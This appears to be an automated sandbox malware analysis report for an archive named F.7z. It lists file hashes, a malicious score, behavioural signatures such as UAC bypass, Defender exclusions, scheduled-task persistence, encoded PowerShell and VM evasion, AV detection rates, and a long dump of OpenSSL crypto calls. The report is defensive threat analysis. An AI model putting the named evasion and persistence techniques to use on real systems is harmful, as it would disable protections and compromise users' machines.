Windows Analysis Report
F.7z

Overview

General Information

Sample name: F.7z
Analysis ID: 1501605
MD5: 5132591a35248a8d71171cb5f4343334
SHA1: 78a0c5b34c107a68cad2d36424a6efbffac11412
SHA256: ef33c2231c3d46e64e1d070493ef920e34fd4b7aec4145711eeac0cb0ccb6651
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: TrustedPath UAC Bypass Pattern
Yara detected Powershell decode and execute
Adds a directory exclusion to Windows Defender
Changes security center settings (notifications, updates, antivirus, firewall)
Creates a Windows Service pointing to an executable in C:\Windows
Drops executables to the windows directory (C:\Windows) and starts them
Found suspicious ZIP file
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to create an SMB header
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Explorer Process Tree Break
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection
barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x249569.dat ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x249569.dat Virustotal: Detection: 41% Perma Link
Source: C:\Windows \System32\x249569.dat ReversingLabs: Detection: 54%
Source: C:\Windows \System32\x249569.dat Virustotal: Detection: 41% Perma Link
Source: C:\Windows\System32\console_zero.exe ReversingLabs: Detection: 75%
Source: C:\Windows\System32\console_zero.exe Virustotal: Detection: 71% Perma Link
Source: C:\Windows\System32\usvc.dat ReversingLabs: Detection: 95%
Source: C:\Windows\System32\usvc.dat Virustotal: Detection: 56% Perma Link
Source: C:\Windows\System32\x338625.dat ReversingLabs: Detection: 79%
Multi AV Scanner detection for submitted file
Source: F.7z ReversingLabs: Detection: 27%
Source: F.7z Virustotal: Detection: 31% Perma Link
Machine Learning detection for dropped file
Source: C:\Windows\System32\x338625.dat Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE72DB0 OPENSSL_LH_retrieve,CRYPTO_free,OPENSSL_LH_delete,OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_delete,CRYPTO_free, 46_2_00007FFA2CE72DB0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE2EDB0 CRYPTO_THREAD_run_once, 46_2_00007FFA2CE2EDB0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA0D80 CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CEA0D80
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE54D30 SRP_Calc_u_ex,BN_num_bits,CRYPTO_malloc,ERR_new,ERR_set_debug,BN_bn2bin,BN_clear_free,BN_clear_free, 46_2_00007FFA2CE54D30
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE4CD10 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_memdup,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE4CD10
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE7ED00 OPENSSL_cleanse,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE7ED00
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE2ECD0 COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_sort, 46_2_00007FFA2CE2ECD0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE94CC0 EVP_MD_CTX_new,EVP_PKEY_new_raw_private_key_ex,EVP_DigestSignInit_ex,EVP_DigestSign,EVP_MD_CTX_free,EVP_PKEY_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,_time64,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CE94CC0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE24E80 CRYPTO_free, 46_2_00007FFA2CE24E80
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE7EDD0 OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE7EDD0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE3CDC0 CRYPTO_malloc,CRYPTO_clear_free, 46_2_00007FFA2CE3CDC0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE82FA0 ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_set_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_CIPHER_CTX_get0_cipher,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free, 46_2_00007FFA2CE82FA0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8EFA0 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug, 46_2_00007FFA2CE8EFA0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE72F60 EVP_EncryptUpdate,OPENSSL_LH_retrieve, 46_2_00007FFA2CE72F60
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE96F60 memchr,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CE96F60
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE32F50 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once, 46_2_00007FFA2CE32F50
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE72F00 OPENSSL_LH_free,OPENSSL_LH_free,EVP_CIPHER_CTX_free,CRYPTO_free, 46_2_00007FFA2CE72F00
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE40EF0 CRYPTO_malloc,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error, 46_2_00007FFA2CE40EF0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE7EED0 CRYPTO_malloc,CRYPTO_free, 46_2_00007FFA2CE7EED0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE4CED0 CRYPTO_free,memset,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CE4CED0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE2B0B0 i2d_PUBKEY,ASN1_item_i2d,CRYPTO_free, 46_2_00007FFA2CE2B0B0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA1090 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CEA1090
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE35070 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock, 46_2_00007FFA2CE35070
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE35050 CRYPTO_set_ex_data, 46_2_00007FFA2CE35050
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE73040 RAND_priv_bytes_ex,CRYPTO_zalloc,EVP_CIPHER_fetch,EVP_CIPHER_CTX_new,EVP_CIPHER_free,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,OPENSSL_LH_doall,OPENSSL_LH_free,EVP_CIPHER_CTX_free,CRYPTO_free,EVP_CIPHER_free, 46_2_00007FFA2CE73040
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE45040 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CE45040
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8B040 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CE8B040
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE21030 GetEnvironmentVariableW,GetACP,MultiByteToWideChar,malloc,MultiByteToWideChar,GetEnvironmentVariableW,malloc,GetEnvironmentVariableW,WideCharToMultiByte,CRYPTO_malloc,WideCharToMultiByte,CRYPTO_free,free,free,getenv, 46_2_00007FFA2CE21030
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE2D010 EVP_PKEY_free,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE2D010
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE41000 CRYPTO_malloc,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,CRYPTO_realloc,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_set_error, 46_2_00007FFA2CE41000
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE6CFF0 CRYPTO_realloc, 46_2_00007FFA2CE6CFF0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8AFE0 CRYPTO_free, 46_2_00007FFA2CE8AFE0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA8FD0 CRYPTO_free,CRYPTO_malloc,ERR_new,RAND_bytes_ex,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug, 46_2_00007FFA2CEA8FD0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE26FC0 EVP_MD_get_size,EVP_CIPHER_get_iv_length,EVP_CIPHER_get_key_length,CRYPTO_clear_free,CRYPTO_malloc,ERR_new,ERR_set_debug, 46_2_00007FFA2CE26FC0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE4C9A0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE4C9A0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE6E960 BIO_ADDR_family,BIO_ADDR_family,memcmp,BIO_ADDR_family,BIO_ADDR_family,memcmp,CRYPTO_malloc,BIO_ADDR_clear,BIO_ADDR_clear, 46_2_00007FFA2CE6E960
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE7A940 CRYPTO_zalloc, 46_2_00007FFA2CE7A940
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE22940 CRYPTO_zalloc,_beginthreadex,CRYPTO_free, 46_2_00007FFA2CE22940
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE92930 CRYPTO_realloc, 46_2_00007FFA2CE92930
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE6A910 CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free, 46_2_00007FFA2CE6A910
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE2CAB0 X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free, 46_2_00007FFA2CE2CAB0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE36A90 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_new_reserve,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,OSSL_PARAM_construct_int,OSSL_PARAM_construct_end,X509_VERIFY_PARAM_get_depth,X509_VERIFY_PARAM_set_depth,CRYPTO_dup_ex_data,X509_VERIFY_PARAM_inherit,OPENSSL_sk_dup,OPENSSL_sk_dup, 46_2_00007FFA2CE36A90
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE22A80 CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE22A80
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE7AA70 CRYPTO_realloc, 46_2_00007FFA2CE7AA70
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE34A72 CRYPTO_memdup,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE34A72
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE86A60 ERR_new,ERR_set_debug,SetLastError,BIO_write,BIO_test_flags,BIO_test_flags,ERR_new,ERR_set_debug,CRYPTO_free, 46_2_00007FFA2CE86A60
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE54A60 ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,BN_clear_free, 46_2_00007FFA2CE54A60
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE96A30 CRYPTO_memcmp,ERR_new,ERR_set_debug,memchr,ERR_new,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CE96A30
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE44A20 ERR_new,ERR_set_debug,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,ERR_new,ERR_set_debug,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CE44A20
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE349F0 CRYPTO_memdup,CRYPTO_free, 46_2_00007FFA2CE349F0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA69E0 CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_fetch,EVP_CIPHER_get_iv_length,RAND_bytes_ex,EVP_CIPHER_free,EVP_EncryptUpdate,EVP_EncryptFinal,ERR_new,EVP_CIPHER_free,ERR_new,CRYPTO_free,EVP_CIPHER_CTX_free,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get_iv_length,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_CIPHER_CTX_free, 46_2_00007FFA2CEA69E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE3E9C0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug, 46_2_00007FFA2CE3E9C0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE949C0 CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug, 46_2_00007FFA2CE949C0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE56BB0 CRYPTO_malloc, 46_2_00007FFA2CE56BB0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE72BA0 OPENSSL_LH_retrieve,CRYPTO_zalloc,CRYPTO_free,OPENSSL_LH_insert,OPENSSL_LH_insert,OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_insert, 46_2_00007FFA2CE72BA0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE88B90 BIO_free,BIO_free,BIO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,OPENSSL_cleanse,CRYPTO_free, 46_2_00007FFA2CE88B90
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE98B90 CRYPTO_free,CRYPTO_memdup, 46_2_00007FFA2CE98B90
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE6AB80 CRYPTO_free, 46_2_00007FFA2CE6AB80
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE4CB80 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE4CB80
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE2AB80 ERR_new,ERR_set_debug,ERR_set_error,ASN1_item_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,X509_free,EVP_PKEY_free,d2i_PUBKEY_ex,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ASN1_item_free, 46_2_00007FFA2CE2AB80
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE2CB70 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_free,EVP_PKEY_up_ref,X509_up_ref,EVP_PKEY_up_ref,X509_chain_up_ref,CRYPTO_memdup,CRYPTO_malloc,memcpy,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_malloc,memcpy,CRYPTO_memdup,X509_STORE_up_ref,X509_STORE_up_ref,CRYPTO_strdup, 46_2_00007FFA2CE2CB70
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE56B30 CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE56B30
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8CB30 EVP_MD_get_size,ERR_new,ERR_set_debug,EVP_MD_CTX_new,EVP_DigestInit_ex,EVP_DigestFinal_ex,EVP_DigestInit_ex,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,EVP_DigestUpdate,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_PKEY_new_raw_private_key_ex,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,EVP_DigestSignUpdate,EVP_DigestSignFinal,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,EVP_PKEY_free,EVP_MD_CTX_free, 46_2_00007FFA2CE8CB30
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA0B30 CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_zalloc,CRYPTO_free, 46_2_00007FFA2CEA0B30
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE7EB20 CRYPTO_free, 46_2_00007FFA2CE7EB20
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE90B20 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy, 46_2_00007FFA2CE90B20
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE3AAD0 CRYPTO_set_ex_data, 46_2_00007FFA2CE3AAD0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA0AD0 CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CEA0AD0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE44CB0 CRYPTO_zalloc,CRYPTO_new_ex_data,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_clear_free,memcpy, 46_2_00007FFA2CE44CB0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE88CA0 CRYPTO_zalloc,OSSL_PARAM_get_int,ERR_new,OSSL_PARAM_get_uint,ERR_new,strcmp,OSSL_PARAM_get_uint32,ERR_new,strcmp,OSSL_PARAM_get_int,ERR_new,OSSL_PARAM_get_int,ERR_new,ERR_new,ERR_set_debug,BIO_up_ref,BIO_free,BIO_up_ref,BIO_up_ref,ERR_new,ERR_set_debug,ERR_set_error,EVP_CIPHER_is_a,EVP_CIPHER_is_a, 46_2_00007FFA2CE88CA0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE28C60 EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset, 46_2_00007FFA2CE28C60
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE22C60 CRYPTO_zalloc,CRYPTO_free, 46_2_00007FFA2CE22C60
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEACC60 BN_bin2bn,ERR_new,ERR_set_debug,BN_ucmp,BN_is_zero,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CEACC60
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE6AC50 CRYPTO_zalloc,OSSL_ERR_STATE_new,CRYPTO_free, 46_2_00007FFA2CE6AC50
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE3ABF0 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock, 46_2_00007FFA2CE3ABF0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE725B0 OPENSSL_cleanse,CRYPTO_free, 46_2_00007FFA2CE725B0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE545A0 BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,CRYPTO_free,CRYPTO_strdup, 46_2_00007FFA2CE545A0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE325A0 CRYPTO_strdup,CRYPTO_free, 46_2_00007FFA2CE325A0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEAC5A0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CEAC5A0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE48580 CRYPTO_malloc,CRYPTO_realloc,memset,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_new,ERR_set_mark,EVP_KEYMGMT_fetch,X509_STORE_CTX_get0_param,OBJ_create,OBJ_txt2nid,OBJ_txt2nid,OBJ_nid2obj,OBJ_create,OBJ_create,OBJ_create,OBJ_txt2nid,OBJ_txt2nid,OBJ_txt2nid,OBJ_add_sigid,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE48580
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE5E510 memcmp,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,ERR_set_debug,OSSL_ERR_STATE_new,OSSL_ERR_STATE_save,CRYPTO_free, 46_2_00007FFA2CE5E510
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA2500 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy, 46_2_00007FFA2CEA2500
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE324D0 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free, 46_2_00007FFA2CE324D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE6E660 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE6E660
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE44660 CRYPTO_free,CRYPTO_malloc,memcpy, 46_2_00007FFA2CE44660
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE72630 OPENSSL_cleanse,CRYPTO_free, 46_2_00007FFA2CE72630
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE92630 CRYPTO_memdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE92630
